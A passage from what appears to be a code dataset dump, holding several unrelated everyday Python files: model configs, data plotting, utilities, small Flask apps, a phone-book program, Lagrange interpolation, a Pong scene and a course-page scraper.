dict(img_size=[864,1152], patch_size=[4, 8, 16, 32], in_chans=3, embed_dim=96, depths=[2, 2, 18, 2], \n num_heads=[3, 6, 12, 24], group_size=[7, 7, 7, 7], crs_interval=[8, 4, 2, 1], \n mlp_ratio=4., qkv_bias=True, qk_scale=None, drop_rate=0.0, attn_drop_rate=0, drop_path_rate=0.3,\n patch_norm=True, use_checkpoint=False, merge_size=[[2,4], [2,4], [2,4]], pretrained=None\n ),\n 'mask_rcnn_crossformer_s_fpn_1x_coco':\n # [96,192,384,768]\n dict(img_size = [864,1152], patch_size=[4, 8, 16, 32],in_chans=3, embed_dim=96, depths=[2, 2, 6, 2], \n num_heads=[3, 6, 12, 24], group_size=[7,7,7,7], crs_interval=[8, 4, 2, 1], \n mlp_ratio=4., qkv_bias=True, qk_scale=None, drop_rate=0., attn_drop_rate=0., drop_path_rate=0.2,\n patch_norm=True, use_checkpoint=False, merge_size=[[2,4], [2,4], [2,4]], pretrained=None\n ),\n 'mask_rcnn_crossformer_b_fpn_1x_coco':\n # [96,192,384,768\n dict(img_size=[864,1152], patch_size=[4, 8, 16, 32], in_chans=3, embed_dim=96, depths=[2, 2, 18, 2], \n num_heads=[3, 6, 12, 24], group_size=[7, 7, 7, 7], crs_interval=[8, 4, 2, 1], \n mlp_ratio=4., qkv_bias=True, qk_scale=None, drop_rate=0.0, attn_drop_rate=0, drop_path_rate=0.3,\n patch_norm=True, use_checkpoint=False, merge_size=[[2,4], [2,4], [2,4]], pretrained=None\n ),\n }\n\ndef build_transformer(args):\n cfgs = configs[args.backbone]\n cfgs.update({'pretrained': args.pretrained})\n return Transformer(\n e_cfgs = cfgs, \n d_model=args.dec_hidden_dim,\n dropout=args.dropout,\n d_nhead=args.dec_nheads,\n dim_feedforward=args.dim_feedforward,\n num_decoder_layers=args.dec_layers,\n normalize_before=args.pre_norm,\n return_intermediate_dec=True,\n )","sub_path":"models/crossformer.py","file_name":"crossformer.py","file_ext":"py","file_size_in_byte":52724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"607936488","text":"import pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.ticker as mticker\r\nimport numpy as np\r\n\r\n\r\ndf = pd.read_csv(\"/home/maresoc870/Documents/Stopien_II/Semestr_2/AS/Code/preprocess/processed_csvs/month_to_crime.csv\")\r\ndf[\"Date\"] = df[\"Month\"].astype(str) + \"/\" + df[\"Year\"].astype(str)\r\ndf = df.sort_values([\"Year\", \"Month\"]).reset_index(drop = True)\r\ndf[\"Order\"] = df.index\r\n\r\nprint(df.head(20))\r\n\r\nfig,ax = plt.subplots()\r\ng = sns.lineplot(x=\"Order\", y=\"Crimes Amount\", data=df)\r\nax.set(xlim=(0, df[\"Order\"].max()+1))\r\n\r\nmyLocator = mticker.MultipleLocator(12)\r\ng.xaxis.set_major_locator(myLocator)\r\n\r\ng.set_xticklabels(df[\"Year\"][0::11])\r\nplt.xticks(rotation=90)\r\n\r\nplt.show()\r\n\r\nfor year in np.unique(df[\"Year\"]):\r\n crimes_holder = df.loc[df[\"Year\"] == year][\"Crimes Amount\"]\r\n min_max_holder = (crimes_holder - np.min(crimes_holder)) / (np.max(crimes_holder) - np.min(crimes_holder))\r\n df.loc[df[\"Year\"] == year,\"Norm Crimes Amount\"] = min_max_holder\r\n\r\n\r\nfig,ax = plt.subplots()\r\n\r\nh = sns.lineplot(x=\"Month\", y=\"Norm Crimes Amount\", data=df.loc[df[\"Year\"] != 2019], hue = \"Year\", legend = 'full',\r\n palette=sns.color_palette(\"YlOrBr\", n_colors=len(np.unique(df[\"Year\"]))-1))\r\nplt.legend(bbox_to_anchor=(1.02, 0.9), loc=2, borderaxespad=0.)\r\nmyLocator = mticker.MultipleLocator(1)\r\nh.xaxis.set_major_locator(myLocator)\r\nplt.show()\r\n\r\n\r\n\r\n\r\nfig,ax = plt.subplots()\r\ndf_part = df.loc[(df[\"Year\"] != 2019)]\r\ndf_part.loc[:,\"Year\"] = df_part[\"Year\"].astype(str)\r\n\r\nrr = sns.boxplot(x=\"Year\", y=\"Norm Crimes Amount\", data=df_part,\r\n palette=sns.color_palette(\"RdBu\", n_colors=len(np.unique(df[\"Year\"]))-1))\r\n#plt.legend(bbox_to_anchor=(1.02, 0.9), loc=2, borderaxespad=0.)\r\n#ax.set_xlim(0, 12)\r\nplt.show()\r\n\r\n\r\nsns.pairplot(df, aspect = 0.8, vars = [\"Year\", \"Month\", 'Crimes Amount', 'Arrest', 'Domestic'], size=1.9, plot_kws={\"s\": 4})\r\nplt.show()\r\n\r\n\r\n'''for year in np.unique(df[\"Year\"]):\r\n sns.regplot(x=\"Month\", y = \"Domestic\", data=df.loc[(df[\"Year\"] == year)],\r\n scatter_kws={\"s\": 80},order=2, ci=None, truncate=True)\r\n\r\nplt.legend(bbox_to_anchor=(1.02, 0.9), loc=2, borderaxespad=0.)\r\nplt.show()'''\r\n\r\n","sub_path":"visualisations/month_to_crime.py","file_name":"month_to_crime.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"109470863","text":"import os\nimport datetime\n\nfrom collections import OrderedDict, Counter\n\nfrom TimeCsv.consts import *\n\n#\n# file utils\n#\n# get the newsest file\ndef newest(path=DEFAULT_DATA_DIRECTORY):\n\tfiles = os.listdir(path)\n\tpaths = [os.path.join(path, basename) for basename in files]\n\treturn max(paths, key=os.path.getctime)\n\n#\n# parsing utils\n#\ndef ordered_unique(l):\n\treturn list(OrderedDict.fromkeys(l))\n\ndef counter(data):\n return list(Counter(data).items())\n\n#\n# regex utils\n#\ndef re_escape(x):\n\treturn ''.join(\n\t\t(\n\t\t\t'\\\\'+i\n\t\t\t if\n\t\t\ti in re.sre_parse.SPECIAL_CHARS\n\t\t\t else\n\t\t\ti\n\t\t)\n\t\tfor i in x\n\t)\n\ndef re_exact(x):\n\treturn f\"\\\\b{x}\\\\b\"\n\n#\n# datetime utils\n#\ndef get_ymd_tuple(d):\n\t\"ymd stands for Year, Month, Day\"\n\treturn (d.year, d.month, d.day)\n\ndef get_midnight(d):\n\treturn datetime.datetime(*get_ymd_tuple(d))\n\ndef seconds_to_str(n):\n\tn = int(n)\n\n\ts = ''\n\n\tdays = (n // (60*60*24))\n\tif days:\n\t\ts += f\"{days:3d} days\"\n\telse:\n\t\ts += \" \" * (3+1+4)\n\n\ts += ' '\n\n\thours = (n // (60*60) % (24))\n\tif hours:\n\t\ts += f\"{hours:2d} hours\"\n\telse:\n\t\ts += \" \" * (2+1+5)\n\n\ts += ' '\n\n\tminutes = (n // (60) % (60*24) % 60)\n\tif minutes:\n\t\ts += f\"{minutes:2d} minutes\"\n\telse:\n\t\ts += \" \" * (2+1+7)\n\n\treturn s\n\ndef seconds_to_hours_str(n):\n\th = n / (3600)\n\treturn f\"{h:.2f}\"\n\ndef shorten_selected_time(selected_time):\n\tif len(selected_time) > 33:\n\t\treturn \"Multiple Time Filters\"\n\telse:\n\t\treturn selected_time\n\ndef format_dates(date1, date2):\n\treturn DATE_REPRESENTATION_PATTERN % (\n\t\t*get_ymd_tuple(date1),\n\t\t*get_ymd_tuple(date2),\n\t)\n\n#\n# debug utils\n#\ndef print_items(l, ret=False):\n\tif ret:\n\t\treturn '\\n'.join(i.__repr__() for i in l)\n\telse:\n\t\tprint('\\n'.join(i.__repr__() for i in l))\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"222736719","text":"# Code Eval - minimum coins\n# https://www.codeeval.com/open_challenges/74/\n\nimport sys\n\ntest_cases = open(sys.argv[1], 'r')\nfor test in test_cases:\n test = int(test)\n coins = 0\n while test > 0:\n while test >= 5:\n test -= 5\n coins += 1\n while test >= 3:\n test -= 3\n coins += 1\n while test >= 1:\n coins += 1\n test -= 1\n print(coins)\n\ntest_cases.close()","sub_path":"CodeEval/python/moderate/minimum-coins/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"584804698","text":"from flask import Flask, render_template, request, jsonify\nfrom ocr import ocr\n\napp = Flask(__name__,\n template_folder='templates',\n static_folder='static',\n static_url_path='/static')\n\nALLOWED_EXTENSIONS = {'pdf', 'png', 'jpg', 'jpeg', 'gif'}\n\n\n@app.route('/')\ndef index():\n \"\"\"\n Serve our app's homepage.\n :return: Jinja2-rendered HTML file.\n \"\"\"\n return render_template('index.html')\n\n\n@app.route('/process')\ndef process_image():\n \"\"\"\n Process a file upload to our server.\n :return: JSON data resulting from our processing.\n \"\"\"\n if 'file' not in request.files:\n return jsonify(success=False,\n error_msg='No file in request.',\n img_text=\"\")\n\n file = request.files['file']\n if file_good(file):\n img_text = ocr(file.filename)\n\n return jsonify(success=True,\n error_msg=\"\",\n img_text=img_text)\n else:\n return jsonify(success=False,\n error_msg=\"File was not an image file/wrong filetype.\",\n img_text=\"\")\n\n\ndef file_good(file):\n if file.filename == '':\n return False\n elif file.filename not in ALLOWED_EXTENSIONS:\n return False\n else:\n return True\n\n\nif __name__ == '__main__':\n app.run(DEBUG=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"466690297","text":"import time\r\n\r\nclass agenda_telefonica:\r\n\r\n\tdef __init__(self):\r\n\t\tself.dicc= {}\r\n\r\n\tdef agrega(self,nombre,numero,email):\r\n\t\tself.dicc[nombre] = (numero,email)\r\n\r\n\tdef borrar(self,nombre):\r\n\t\tdel self.dicc[ nombre]\r\n\r\n\tdef actualizar(self,nombre,valores):\r\n\t\tself.dicc[nombre]= valores\r\n\r\n\tdef imprime(self):\r\n\t\tfor i in self.dicc:\r\n\r\n\t\t\tprint(\"\\n\",i,self.dicc[i])\r\n\r\n\tdef exportar(self):\r\n\t\r\n\t\tfichero=open('/Users/molam/Desktop/Agenda_telefono.txt','w')\r\n\t\tfor j in self.dicc:\r\n\t\t\tlista= str(j) , str(self.dicc[j])\r\n\t\t\tfichero.write(str(lista))\r\n\r\n\t\tfichero.close\r\n\r\n\t@property\r\n\tdef cantidad(self):\r\n\t\treturn len(self.dicc)\r\n\r\n\r\nmiagenda=agenda_telefonica()\r\n\r\nmiagenda.agrega(\"Amigos de Fran\",677076532,'pollascalientes@hotmail.com')\r\n\r\n#entrada de datos agenda\r\n\r\ndef opcion_agregar():\r\n\tnumero_telefono= '0'\r\n\tnombre=input(\"\\nIntroduce el nombre de el contacto: \")\r\n\t#while numero_telefono == 'a' or numero_telefono != '2' or numero_telefono != '3' or numero_telefono != '4'or numero_telefono != '5' or numero_telefono != '6' or numero_telefono != '7' or numero_telefono != '8' or numero_telefono != '9':\r\n\tnumero_telefono=input(\"\\nIntroduce el número de teléfono de el contacto: \")\r\n\tcorreo=input(\"\\nIntroduce el correo electrónico de el contacto: \")\r\n\tmiagenda.agrega(nombre,numero_telefono,correo)\r\n\ttime.sleep(1)\r\n\r\ndef opcion_borrar():\r\n\r\n\tnombre_borrar=input(\"\\nIntroduce el nombre de el contacto: \")\r\n\tmiagenda.borrar(nombre_borrar)\r\n\ttime.sleep(1)\r\n\tprint(\"\\nEl contacto {} ha sido borrado exitosamente\\n\".format(nombre_borrar))\r\n\ttime.sleep(1)\r\n\r\ndef opcion_actualizar():\r\n\r\n\tnombre_modificar=input(\"\\nIntroduce el nombre de el contacto que quieras modificar: \")\r\n\tnumero_telefono_modificar=input(\"\\nIntroduce el nuevo número de teléfono de el contacto a modificar: \")\r\n\tcorreo_modificar=input(\"\\nIntroduce el nuevo correo electrónico de el contacto a modificar: \")\r\n\tmiagenda.actualizar(nombre_modificar,(numero_telefono_modificar,correo_modificar))\r\n\ttime.sleep(1)\r\n\r\ndef opcion_mostrar():\r\n\tprint(\"\\n\")\r\n\tmiagenda.imprime()\r\n\ttime.sleep(1)\r\n\r\ndef opcion_num_contactos():\r\n\r\n\tprint(\"\\nLa cantidad de contactos en la agenda es: \",miagenda.cantidad) \r\n\ttime.sleep(1)\r\n\r\ndef opcion_exportar():\r\n\r\n\tmiagenda.exportar()\r\n\tprint(\"\\nLa agenda ha sido exportada en formato 'txt' en tu escritorio\\n\") \r\n\ttime.sleep(1)\r\n\r\n\r\n\t\r\n#Comienzo programa\r\n\r\na=True\r\nopcion=0\r\nwhile a == True:\r\n\r\n\tprint(\"\\n******************************************AGENDA TELEFÓNICA PYTHON******************************************\\n\")\r\n\t\r\n\r\n\twhile opcion != '1' or opcion != '2' or opcion != '3' or opcion != '4' or opcion != '5' or opcion != '6':\r\n\t\tprint(\"\\n*****************************************************************************************************************\\n\")\r\n\t\tprint(\"¿Que quieres hacer?\\n\")\t\r\n\t\topcion=input(\"\\n1. Agregar contacto\\n2. Borrar contacto\\n3. Modificar contacto\\n4. Mostrar información de contacto\\n5. Indicar el número de contactos presentes en la agenda\\n6. Exportar agenda en formato de texto\\n7.Salir\\n\\nElige la opción: \")\r\n\t\t\r\n\t\t\r\n\t\tif opcion is '1':\r\n\t\t\topcion_agregar()\r\n\t\telif opcion is '2':\r\n\t\t\topcion_borrar()\r\n\t\telif opcion is '3':\r\n\t\t\topcion_actualizar()\r\n\t\telif opcion is '4':\r\n\t\t\topcion_mostrar()\r\n\t\telif opcion is '5':\r\n\t\t\topcion_num_contactos()\r\n\t\telif opcion is '6':\r\n\t\t\topcion_exportar()\r\n\t\telif opcion is '7':\r\n\t\t\tprint(\"\\n\")\r\n\t\t\ta=False\r\n\t\t\tbreak\r\n\r\n\r\nprint(\"\\nHasta luego\\n\")\r\n\r\n\r\n","sub_path":"agenda_telefonica.py","file_name":"agenda_telefonica.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"507476665","text":"import sympy as sp\nimport matplotlib.pyplot as plt\n\nxy_values = []\n\n#Initialize x and y values (make sure the X values are in order)\nxy_values.append([0, 0])\nxy_values.append([10, 227.04])\nxy_values.append([15, 362.78])\nxy_values.append([20, 517.35])\nxy_values.append([22.5, 602.97])\nxy_values.append([30, 901.67])\n\n#Select the two data points between the selected xVal\ndef get_first2_indexes(xy_values, xVal):\n indexes = []\n for i in range(len(xy_values)-1):\n if xy_values[i][0] < xVal and xy_values[i+1][0] > xVal:\n indexes.append(i)\n indexes.append(i+1) \n return indexes\n\n#Find the other data points when n>1\ndef get_remaining_indexes(xy_values, indexes, xVal, n):\n for _ in range(n-1):\n #find the value nearest to xVal\n leftIndex = indexes[0]-1\n rightIndex = indexes[len(indexes)-1] + 1\n #Check if the adjacent index exists in the given xy_values data\n if (leftIndex > -1):\n if (rightIndex < len(xy_values)):\n #Check which one is closer to xVal\n if (abs(xy_values[leftIndex][0] - xVal) < abs(xy_values[rightIndex][0] - xVal)):\n indexes.insert(0, leftIndex)\n else:\n indexes.append(rightIndex)\n else:\n indexes.insert(0, leftIndex)\n elif (rightIndex < len(xy_values)):\n indexes.append(rightIndex)\n \n \n#Find the weighting functions\ndef gather_weighting_functions(polynomial):\n wFunc = [] #Collection of Ln(x)\n for i in range(polynomial+1):\n subFunc = [] #Collection of individual (x - xj)/(xi-xj)\n for j in range(polynomial+1):\n #j != i\n if i != j:\n #(x - xj)/(xi-xj)\n #sub = [i, j]\n #sub[0] = xi\n #sub[1] = xj\n sub = []\n sub.append(i)\n sub.append(j)\n subFunc.append(sub)\n wFunc.append(subFunc)\n \n return wFunc\n \n#Add them Together\ndef get_equation(xy_values, wFunc, indexes, x_symbol):\n total = 0\n for i in range(len(wFunc)):\n weight_function_prod = 1\n for a in range(len(wFunc[i])):\n iIndex = wFunc[i][a][0]\n# print(\"iIndex=\", iIndex)\n index = indexes[iIndex]\n# print(\"index=\", index)\n ti = xy_values[index][0]\n# print(\"ti=\", ti)\n jIndex = wFunc[i][a][1]\n# print(\"jIndex=\", jIndex)\n index = indexes[jIndex]\n# print(\"index=\", index)\n tj = xy_values[index][0]\n# print(\"tj=\", tj)\n# print(\"operation= (\", x_symbol,\"-\", tj,\") / (\", ti, \"-\", tj, \")\")\n sub = (x_symbol - tj)/ (ti - tj)\n# print(\"sub weight function=\", sub)\n weight_function_prod *= sub\n #Multiply by f(i)\n# print(\"weight_function_prod =\", weight_function_prod)\n# print(\"xy_values=\", xy_values[indexes[i]][1])\n total += weight_function_prod * xy_values[indexes[i]][1]\n# print(\"current total=\", total)\n return sp.simplify(total)\n\n#Solve with xVal\nx = sp.Symbol('x');\nn = 5 #Order of polynomial (Linear = 1)\nxVal = 16 #Value of x to find\nindexes = get_first2_indexes(xy_values, xVal)\nget_remaining_indexes(xy_values, indexes, xVal, n)\nwFunc = gather_weighting_functions(n)\nequation = get_equation(xy_values, wFunc, indexes, x)\nresult = equation.evalf(subs={x : xVal})\nprint(\"result =\", result) \n\n#Graphing\ndef graph_lagrange(xy_values, equation, xVal, result, x_symbol):\n #split x and y\n x_values = []\n y_values = []\n \n for i in range(len(xy_values)):\n x_values.append(xy_values[i][0])\n y_values.append(xy_values[i][1])\n \n #Generate x and y\n new_x_values = []\n new_y_values = []\n for i in range(int(min(x_values) * 100), int(max(x_values) * 100), 1):\n new_x_values.append(i/100)\n new_y_values.append(equation.evalf(subs={x_symbol:i/100}))\n \n plt.plot(x_values, y_values, 'o', label='data')\n plt.plot(new_x_values, new_y_values, '-', label='equation')\n plt.plot([xVal], [result], '+', label=\"interpolated data\")\n plt.legend()\n plt.xlabel(\"X\")\n plt.ylabel(\"Y\")\n \n plt.show()\n\ngraph_lagrange(xy_values, equation, xVal, result, x)","sub_path":"final_project/lagrange.py","file_name":"lagrange.py","file_ext":"py","file_size_in_byte":4350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"530131673","text":"from app.app_and_db import app, db\nfrom app.pages.models import Trade\nfrom datetime import datetime\nfrom flask import jsonify, render_template, redirect, request, url_for\n\nimport requests\n\nbase_url = \"https://api.twitter.com/1.1/{0}\"\n\n@app.route('/')\ndef index():\n return render_template('pages/home_page.html')\n\n@app.route('/api////')\ndef team_details(year, from_team, to_team):\n trades = Trade.query.filter(Trade.year == year).filter(Trade.from_team == from_team).filter(Trade.to_team == to_team).all()\n json_trades = []\n for trade in trades:\n json_trades.append(trade.serialize())\n return jsonify(trades=json_trades)\n\n@app.route('/api///')\ndef complete_team_details(year, team):\n from_trades = Trade.query.filter(Trade.year == year).filter(Trade.from_team == team).all()\n to_trades = Trade.query.filter(Trade.year == year).filter(Trade.to_team == team).all()\n json_to_trades = []\n json_from_trades = []\n for trade in to_trades:\n json_to_trades.append(trade.serialize())\n for trade in from_trades:\n json_from_trades.append(trade.serialize())\n return jsonify(from_trades=json_from_trades, to_trades=json_to_trades)\n\n@app.route('/api/transaction//')\ndef get_transaction_details(transaction_id):\n trades = Trade.query.filter(Trade.transaction_id == transaction_id).all()\n json_trades = []\n for trade in trades:\n json_trades.append(trade.serialize())\n return jsonify(trades=json_trades)\n\n@app.teardown_appcontext\ndef shutdown_session(exception=None):\n db.remove()","sub_path":"app/pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"509906500","text":"'''\n13) Distance Between Two Cities\n\nCalculates the distance between two cities and allows the user to specify a unit of distance.\nThis program may require finding coordinates for the cities like latitude and longitude.\n'''\n\nfrom geopy import Nominatim\nfrom geopy.distance import vincenty\n\n\ngeolocator = Nominatim()\ncities = ('London', 'Paris', 'Berlin', 'Rome', 'Madrid', 'Lisbon', 'Athens', 'Budapest', 'Warsaw', 'Bucharest', 'Prague')\n[print('{}) {}'.format(cities.index(city)+1, city)) for city in cities]\n\n\ndef choose_city(cities):\n while True:\n city = str(input('Choose city from list: '))\n if city in cities:\n return city\n else:\n print('Insert a city from the list')\n\n\ndef choose_unit():\n while True:\n unit = str(input('Choose metric or imperial: '))\n if unit.lower() == 'metric' or unit.lower() == 'imperial':\n return unit\n else:\n print('Please choose between the two')\n\n\nprint('Choose first city')\nfirst = choose_city(cities)\nprint('Choose second city')\nsecond = choose_city(cities)\nunit = choose_unit()\nprint(unit)\n\nfirst_city = geolocator.geocode(first)\nsecond_city = geolocator.geocode(second)\n\nif unit == 'imperial':\n print('Distance between {} and {} is {} miles'.format(first, second, round(vincenty((first_city.latitude, first_city.longitude), (second_city.latitude, second_city.longitude)).miles, 2)))\nelse:\n print('Distance between {} and {} is {} km'.format(first, second, round(vincenty((first_city.latitude, first_city.longitude), (second_city.latitude, second_city.longitude)).kilometers, 2)))\n","sub_path":"___basic/bootcamp/capstone/01numbers/13cities.py","file_name":"13cities.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"449686878","text":"from MorcoWrapper2D.mw2_Scene import *\nfrom MorcoWrapper2D.mw2_Image import *\nfrom MorcoWrapper2D.mw2_Circle import *\nfrom MorcoWrapper2D.mw2_Text import *\nfrom MorcoWrapper2D.mw2_Rect import *\nfrom ProjectPong.GameManager import *\n\n\nclass GameScene (mw2_Scene):\n\tdef __init__(self):\n\t\tmw2_Scene.__init__(self)\n\n\n\tdef Build(self):\n\t# create background\n\t\tbackground = mw2_GameObject(\"background\")\n\t\tself.AddObject(background)\n\n\t\tbg_back = mw2_Image(\"bg_back\", \"../__Resources/Pong/background.png\")\n\t\tbg_back.mSize = mw2_Vector2(800, 600)\n\t\tbg_back.AttachTo(background)\n\t\tself.AddObject(bg_back)\n\n\t\tbg_left = mw2_Rect(\"bg_left\")\n\t\tbg_left.mSize = mw2_Vector2(400, 600)\n\t\tbg_left.mColor = mw2_Vector4(255, 100, 0, 100)\n\t\tbg_left.AttachTo(background)\n\t\tbg_left.LocalPosition( mw2_Vector2(-200, 0) )\n\t\tself.AddObject(bg_left)\n\n\t\tbg_right = mw2_Rect(\"bg_right\")\n\t\tbg_right.mSize = mw2_Vector2(400, 600)\n\t\tbg_right.mColor = mw2_Vector4(80, 100, 255, 80)\n\t\tbg_right.AttachTo(background)\n\t\tbg_right.LocalPosition( mw2_Vector2(200, 0) )\n\t\tself.AddObject(bg_right)\n\n\t\tbg_netting = mw2_Image(\"bg_netting\", \"../__Resources/Pong/tex_netting.png\")\n\t\tbg_netting.mSize = mw2_Vector2(10, 600)\n\t\tbg_netting.AttachTo(background)\n\t\tself.AddObject(bg_netting)\n\n\t# create paddle 1\n\t\tpaddle1 = mw2_GameObject(\"paddle1\")\n\t\tpaddle1.WorldPosition( mw2_Vector2(-350, 0) )\n\t\tself.AddObject(paddle1)\n\n\t\tp1_fill = mw2_Rect(\"p1_fill\")\n\t\tp1_fill.mSize = mw2_Vector2(30, 100)\n\t\tp1_fill.mColor = mw2_Vector4(255, 150, 0, 100)\n\t\tp1_fill.mStyle = mw2_Rect.Style.FILL\n\t\tp1_fill.AttachTo(paddle1)\n\t\tp1_fill.LocalPosition( mw2_Vector2(0, 0) )\n\t\tself.AddObject(p1_fill)\n\n\t\tp1_line = mw2_Rect(\"p1_line\")\n\t\tp1_line.mSize = mw2_Vector2(30, 100)\n\t\tp1_line.mColor = mw2_Vector4(255, 200, 0, 255)\n\t\tp1_line.mStyle = mw2_Rect.Style.LINE\n\t\tp1_line.AttachTo(paddle1)\n\t\tp1_line.LocalPosition( mw2_Vector2(0, 0) )\n\t\tself.AddObject(p1_line)\n\n\t# create paddle 2\n\t\tpaddle2 = mw2_GameObject(\"paddle2\")\n\t\tpaddle2.WorldPosition( mw2_Vector2(350, 0) )\n\t\tself.AddObject(paddle2)\n\n\t\tp2_fill = mw2_Rect(\"p2_fill\")\n\t\tp2_fill.mSize = mw2_Vector2(30, 100)\n\t\tp2_fill.mColor = mw2_Vector4(0, 120, 255, 100)\n\t\tp2_fill.mStyle = mw2_Rect.Style.FILL\n\t\tp2_fill.AttachTo(paddle2)\n\t\tp2_fill.LocalPosition( mw2_Vector2(0, 0) )\n\t\tself.AddObject(p2_fill)\n\n\t\tp2_line = mw2_Rect(\"p2_line\")\n\t\tp2_line.mSize = mw2_Vector2(30, 100)\n\t\tp2_line.mColor = mw2_Vector4(70, 170, 255, 255)\n\t\tp2_line.mStyle = mw2_Rect.Style.LINE\n\t\tp2_line.AttachTo(paddle2)\n\t\tp2_line.LocalPosition( mw2_Vector2(0, 0) )\n\t\tself.AddObject(p2_line)\n\n\t# create ball\n\t\tball = mw2_GameObject(\"ball\")\n\t\tself.AddObject(ball)\n\n\t\tball_fill = mw2_Circle(\"ball_fill\")\n\t\tball_fill.mRadius = 15\n\t\tball_fill.mColor = mw2_Vector4(0, 120, 255, 100)\n\t\tball_fill.mStyle = mw2_Circle.Style.FILL\n\t\tball_fill.AttachTo(ball)\n\t\tself.AddObject(ball_fill)\n\n\t\tball_line = mw2_Circle(\"ball_line\")\n\t\tball_line.mRadius = 15\n\t\tball_line.mColor = mw2_Vector4(70, 170, 255, 255)\n\t\tball_line.mStyle = mw2_Circle.Style.LINE\n\t\tball_line.AttachTo(ball)\n\t\tself.AddObject(ball_line)\n\n\t# create score\n\t\tscoreText1 = mw2_Text(\n\t\t\t\"scoreText1\",\n\t\t\t\"../__Resources/Pong/Ericsson-GA628.ttf\",\n\t\t\t80,\n\t\t\t\"01\",\n\t\t\tmw2_Vector4(210, 184, 137, 255),\n\t\t\tmw2_Text.Align.CENTER\n\t\t)\n\t\tscoreText1.WorldPosition( mw2_Vector2(-150, -260) )\n\t\tself.AddObject(scoreText1)\n\n\t\tscoreText2 = mw2_Text(\n\t\t\t\"scoreText2\",\n\t\t\t\"../__Resources/Pong/Ericsson-GA628.ttf\",\n\t\t\t80,\n\t\t\t\"02\",\n\t\t\tmw2_Vector4(210, 184, 137, 255),\n\t\t\tmw2_Text.Align.CENTER\n\t\t)\n\t\tscoreText2.WorldPosition( mw2_Vector2(150, -260) )\n\t\tself.AddObject(scoreText2)","sub_path":"full_project/2D/6. Cocos2D [Python2]/ProjectPong/GameScene.py","file_name":"GameScene.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"121329401","text":"\"\"\"\r\nAuthor: Andrew Powell\r\nLast Modified: 20160716\r\nContact: powellandrew@hotmail.com\r\n\"\"\"\r\nimport sqlite3\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom day_time import *\r\n\r\n\r\nclass Course(object):\r\n \"\"\"Extracts and stores basic course information from trico course search page\r\n\r\n This class, given the URL to a trico course page from the trico searchable\r\n schedule, extracts and stores relevant information about the course.\r\n\r\n Attributes:\r\n regid: Department Code and Course Number/Section Info (e.g. 'CPSC 021 01')\r\n course_title: Title of the course (e.g. 'Introduction to Computer Science')\r\n dept: Department in which the course if offered\r\n instructor: Course instructor\r\n time: List of DayTime objects, each DayTime object containing information\r\n on the day of the week and the time at which the course meets\r\n room: Room in which the course meets\r\n \"\"\"\r\n\r\n def __init__(self,url,page_html = None):\r\n \"\"\"Constructor for the Course class, stores course information\r\n\r\n Args:\r\n url: URL to the trico searchable schedule course page (string)\r\n page_html: BeautifulSoup object for a given courge page. Optional,\r\n and intended for debugging purposes. Typical usage would be\r\n Course('DEBUG',BeautifulSoupObject)\r\n\r\n Raises:\r\n TypeError, if page_html is provided but is not a BeautifulSoup object\r\n \"\"\"\r\n if page_html is None:\r\n page_html = requests.get(url);\r\n page_html = BeautifulSoup(page_html.text,'html.parser')\r\n else:\r\n if type(page_html) is not BeautifulSoup:\r\n raise TypeError('page_html must be a BeautifulSoup object')\r\n\r\n self.regid = self.find_regid(page_html)\r\n self.course_title = self.find_course_title(page_html)\r\n self.dept = self.find_dept(page_html)\r\n self.instructor = self.find_instructor(page_html)\r\n self.time = self.find_time(page_html)\r\n self.room = self.find_room(page_html)\r\n\r\n def get_next_row(self,field):\r\n \"\"\" A simple helper method to advance the table row on the course info page\r\n\r\n Args:\r\n field: Current tag\r\n\r\n Returns: Next tag that is not a new line character\r\n \"\"\"\r\n field = field.next_sibling\r\n while field == '\\n':\r\n field = field.next_sibling\r\n return field\r\n\r\n def find_regid(self,page_html):\r\n \"\"\"Helper method used to extract the registration ID from the course webpage\r\n \r\n Args:\r\n page_html: BeautifulSoup object for a given course page\r\n\r\n Returns: String giving dept. code and course number/section info (e.g. 'CPSC 021 01')\r\n\r\n Raises:\r\n ValueError, if no Registration ID header is found in the table of information\r\n \"\"\"\r\n field = page_html.tr\r\n while field is not None:\r\n if field.td.text == 'Registration ID':\r\n return field.td.next_sibling.text\r\n field = self.get_next_row(field)\r\n raise ValueError('Page source invalid. No Registration ID found.')\r\n\r\n def find_course_title(self,page_html):\r\n \"\"\"Helper method used to extract course title from course webpage\r\n \r\n Args:\r\n page_html: BeautifulSoup object for a given course page\r\n\r\n Returns: String containing course title\r\n\r\n Raises:\r\n ValueError, if no title is found in the table of information\r\n \"\"\"\r\n field = page_html.tr\r\n while field is not None:\r\n if field.td.text == 'Course Title':\r\n return field.td.next_sibling.text\r\n field = self.get_next_row(field)\r\n raise ValueError('Page source invalid. No Course Title found.')\r\n\r\n def find_dept(self,page_html):\r\n \"\"\"Helper method used to extract department from course webpage\r\n\r\n Args:\r\n page_html: BeautifulSoup object for a given course page\r\n\r\n Returns: String containing department in which course is offered\r\n\r\n Raises:\r\n ValueError, if no department is found in the table of information\r\n \"\"\"\r\n field = page_html.tr\r\n while field is not None:\r\n if field.td.text 